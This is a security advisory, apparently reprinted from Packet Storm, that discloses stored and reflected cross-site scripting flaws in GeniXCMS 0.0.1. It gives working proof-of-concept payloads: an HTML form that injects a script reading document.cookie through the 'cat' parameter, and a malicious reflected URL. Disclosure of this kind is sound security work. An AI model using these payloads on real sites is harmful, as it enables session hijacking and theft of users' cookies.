Lucene search
K

GeniXCMS 0.0.1 Cross Site Scripting

🗓️ 11 Mar 2015 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

GeniXCMS v0.0.1 Persistent Script Insertion Vulnerability in PHP Based CMS

Code
`  
GeniXCMS v0.0.1 Persistent Script Insertion Vulnerability  
  
Vendor: MetalGenix  
Product web page: http://www.genixcms.org  
Affected version: 0.0.1  
  
Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).  
It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to  
Advanced Developer. Some manual configurations are needed to make this application to  
work.  
  
Desc: Input passed to the 'cat' POST parameter is not properly sanitised before being  
returned to the user. This can be exploited to execute arbitrary HTML and script code  
in a user's browser session in context of an affected site.  
  
Tested on: nginx/1.4.6 (Ubuntu)  
Apache 2.4.10 (Win32)  
PHP 5.6.3  
MySQL 5.6.21  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5233  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5233.php  
  
  
05.03.2015  
  
---  
  
  
Stored:  
-------  
  
<html>  
<body>  
<form action="http://localhost/genixcms/gxadmin/index.php?page=categories" method="POST">  
<input type="hidden" name="parent" value="2" />  
<input type="hidden" name="cat" value='"><script>alert(document.cookie)</script>' />  
<input type="hidden" name="addcat" value="" />  
<input type="submit" value="Insert" />  
</form>  
</body>  
</html>  
  
  
  
Reflected:  
----------  
  
http://localhost/genixcms/index.php?page=1<script>confirm("ZSL")</script>'  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation